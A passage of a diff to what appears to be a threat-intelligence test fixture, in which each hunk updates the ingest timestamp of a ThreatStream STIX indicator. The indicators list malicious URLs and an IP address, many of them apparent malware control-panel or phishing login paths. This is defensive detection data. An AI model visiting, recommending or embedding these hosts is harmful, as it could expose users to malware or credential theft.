"2021-12-13T08:38:40.026363600Z", + "ingested": "2021-12-14T14:57:43.118447188Z", "original": "{\"created\":\"2020-02-23T02:53:27.735Z\",\"description\":\"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ff626727-4888-4cba-9257-470f0a70891a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:27.735Z\",\"name\":\"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.735Z\"}", "category": "threat", "type": "indicator", @@ -28861,7 +28861,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026368Z", + "ingested": "2021-12-14T14:57:43.118447711Z", "original": "{\"created\":\"2020-02-23T02:53:40.401Z\",\"description\":\"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:40.401Z\",\"name\":\"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.401Z\"}", "category": "threat", "type": "indicator", @@ -28913,7 +28913,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026372900Z", + "ingested": "2021-12-14T14:57:43.118448168Z", "original": "{\"created\":\"2020-02-23T02:53:40.432Z\",\"description\":\"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9d14574f-9af7-493d-84a2-f631570f1940\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:53:40.432Z\",\"name\":\"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.432Z\"}", "category": "threat", "type": "indicator", @@ -28964,7 +28964,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026376300Z", + "ingested": "2021-12-14T14:57:43.118448559Z", "original": "{\"created\":\"2020-02-23T02:53:40.453Z\",\"description\":\"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:40.453Z\",\"name\":\"mal_url: http://mactreher.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mactreher.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.453Z\"}", "category": "threat", "type": "indicator", @@ -29016,7 +29016,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026381200Z", + "ingested": "2021-12-14T14:57:43.118448966Z", "original": "{\"created\":\"2020-02-23T02:53:42.405Z\",\"description\":\"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.405Z\",\"name\":\"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.405Z\"}", "category": "threat", "type": "indicator", @@ -29068,7 +29068,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026386800Z", + "ingested": "2021-12-14T14:57:43.118449350Z", "original": "{\"created\":\"2020-02-23T02:53:42.443Z\",\"description\":\"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.443Z\",\"name\":\"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.443Z\"}", "category": "threat", "type": "indicator", @@ -29120,7 +29120,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026392500Z", + "ingested": "2021-12-14T14:57:43.118449859Z", "original": "{\"created\":\"2020-02-23T02:53:47.65Z\",\"description\":\"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-23T02:53:47.65Z\",\"name\":\"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:47.65Z\"}", "category": "threat", "type": "indicator", @@ -29172,7 +29172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026399600Z", + "ingested": "2021-12-14T14:57:43.118450297Z", "original": "{\"created\":\"2020-02-23T02:53:53.437Z\",\"description\":\"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:53.437Z\",\"name\":\"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:53.437Z\"}", "category": "threat", "type": "indicator", @@ -29224,7 +29224,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026406300Z", + "ingested": "2021-12-14T14:57:43.118450930Z", "original": "{\"created\":\"2020-02-23T02:54:02.069Z\",\"description\":\"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6d4b1407-6885-4030-beae-43747e458b8a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:02.069Z\",\"name\":\"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:02.069Z\"}", "category": "threat", "type": "indicator", @@ -29276,7 +29276,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026413Z", + "ingested": "2021-12-14T14:57:43.118451418Z", "original": "{\"created\":\"2020-02-23T02:54:09.172Z\",\"description\":\"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:09.172Z\",\"name\":\"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:09.172Z\"}", "category": "threat", "type": "indicator", @@ -29328,7 +29328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026419700Z", + "ingested": "2021-12-14T14:57:43.118451823Z", "original": "{\"created\":\"2020-02-23T02:54:15.807Z\",\"description\":\"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--27b834b0-4113-4eca-8989-d7ada85d0779\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:15.807Z\",\"name\":\"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:15.807Z\"}", "category": "threat", "type": "indicator", @@ -29380,7 +29380,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026426500Z", + "ingested": "2021-12-14T14:57:43.118452281Z", "original": "{\"created\":\"2020-02-23T02:54:17.76Z\",\"description\":\"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56334c71-2f84-4e09-a6cc-017577b99970\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:17.76Z\",\"name\":\"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:17.76Z\"}", "category": "threat", "type": "indicator", @@ -29425,7 +29425,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026433500Z", + "ingested": "2021-12-14T14:57:43.118452672Z", "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", "category": "threat", "type": "indicator", @@ -29477,7 +29477,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026440200Z", + "ingested": "2021-12-14T14:57:43.118453224Z", "original": "{\"created\":\"2020-02-23T02:54:25.477Z\",\"description\":\"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--8b4fe873-9b07-4985-9818-291623fc07b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-23T02:54:25.477Z\",\"name\":\"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:25.477Z\"}", "category": "threat", "type": "indicator", @@ -29529,7 +29529,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026446800Z", + "ingested": "2021-12-14T14:57:43.118453792Z", "original": "{\"created\":\"2020-02-23T02:54:39.696Z\",\"description\":\"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:39.696Z\",\"name\":\"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.696Z\"}", "category": "threat", "type": "indicator", @@ -29581,7 +29581,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026453500Z", + "ingested": "2021-12-14T14:57:43.118454226Z", "original": "{\"created\":\"2020-02-23T02:54:39.976Z\",\"description\":\"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0748270e-f010-4598-a389-553d3fffcb48\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:39.976Z\",\"name\":\"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.976Z\"}", "category": "threat", "type": "indicator", @@ -29626,7 +29626,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026460200Z", + "ingested": "2021-12-14T14:57:43.118454685Z", "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", "category": "threat", "type": "indicator", @@ -29678,7 +29678,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026466800Z", + "ingested": "2021-12-14T14:57:43.118455251Z", "original": "{\"created\":\"2020-02-23T02:54:40.281Z\",\"description\":\"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:54:40.281Z\",\"name\":\"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.281Z\"}", "category": "threat", "type": "indicator", @@ -29723,7 +29723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026473600Z", + "ingested": "2021-12-14T14:57:43.118455650Z", "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", "category": "threat", "type": "indicator", @@ -29775,7 +29775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026476800Z", + "ingested": "2021-12-14T14:57:43.118456036Z", "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://89.160.20.156/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", "category": "threat", "type": "indicator", @@ -29827,7 +29827,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026481600Z", + "ingested": "2021-12-14T14:57:43.118456539Z", "original": "{\"created\":\"2020-02-23T02:54:54.071Z\",\"description\":\"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:54.071Z\",\"name\":\"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:54.071Z\"}", "category": "threat", "type": "indicator", @@ -29879,7 +29879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026486700Z", + "ingested": "2021-12-14T14:57:43.118456981Z", "original": "{\"created\":\"2020-02-23T02:55:00.871Z\",\"description\":\"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:55:00.871Z\",\"name\":\"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.871Z\"}", "category": "threat", "type": "indicator", @@ -29931,7 +29931,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026492500Z", + "ingested": "2021-12-14T14:57:43.118457483Z", "original": "{\"created\":\"2020-02-23T02:55:00.907Z\",\"description\":\"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:00.907Z\",\"name\":\"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.907Z\"}", "category": "threat", "type": "indicator", @@ -29983,7 +29983,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026496200Z", + "ingested": "2021-12-14T14:57:43.118457882Z", "original": "{\"created\":\"2020-02-23T02:55:00.94Z\",\"description\":\"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:55:00.94Z\",\"name\":\"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.94Z\"}", "category": "threat", "type": "indicator", @@ -30035,7 +30035,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026501100Z", + "ingested": "2021-12-14T14:57:43.118458316Z", "original": "{\"created\":\"2020-02-23T02:55:03.894Z\",\"description\":\"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:03.894Z\",\"name\":\"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:03.894Z\"}", "category": "threat", "type": "indicator", @@ -30087,7 +30087,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026507900Z", + "ingested": "2021-12-14T14:57:43.118458758Z", "original": "{\"created\":\"2020-02-23T02:55:15.714Z\",\"description\":\"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:55:15.714Z\",\"name\":\"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:15.714Z\"}", "category": "threat", "type": "indicator", @@ -30138,7 +30138,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026512100Z", + "ingested": "2021-12-14T14:57:43.118459145Z", "original": "{\"created\":\"2020-02-24T02:54:25.932Z\",\"description\":\"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-24T02:54:25.932Z\",\"name\":\"mal_url: http://saind.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://saind.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-24T02:54:25.932Z\"}", "category": "threat", "type": "indicator", @@ -30190,7 +30190,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026516600Z", + "ingested": "2021-12-14T14:57:43.118459555Z", "original": "{\"created\":\"2020-02-25T02:52:18.371Z\",\"description\":\"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--c19c0ccc-9df8-4804-83da-1c469d220574\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:18.371Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/7/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/7/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:18.371Z\"}", "category": "threat", "type": "indicator", @@ -30242,7 +30242,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026519900Z", + "ingested": "2021-12-14T14:57:43.118459943Z", "original": "{\"created\":\"2020-02-25T02:52:27.703Z\",\"description\":\"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:27.703Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/14/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/14/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.703Z\"}", "category": "threat", "type": "indicator", @@ -30294,7 +30294,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026524600Z", + "ingested": "2021-12-14T14:57:43.118460332Z", "original": "{\"created\":\"2020-02-25T02:52:27.729Z\",\"description\":\"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--952cf095-32f4-4b10-8680-499ccd9f784f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:27.729Z\",\"name\":\"mal_url: http://pabloemino.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pabloemino.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.729Z\"}", "category": "threat", "type": "indicator", @@ -30345,7 +30345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026530Z", + "ingested": "2021-12-14T14:57:43.118460806Z", "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", "category": "threat", "type": "indicator", @@ -30390,7 +30390,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026535800Z", + "ingested": "2021-12-14T14:57:43.118461193Z", "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}", "category": "threat", "type": "indicator", @@ -30435,7 +30435,7 @@ } }, 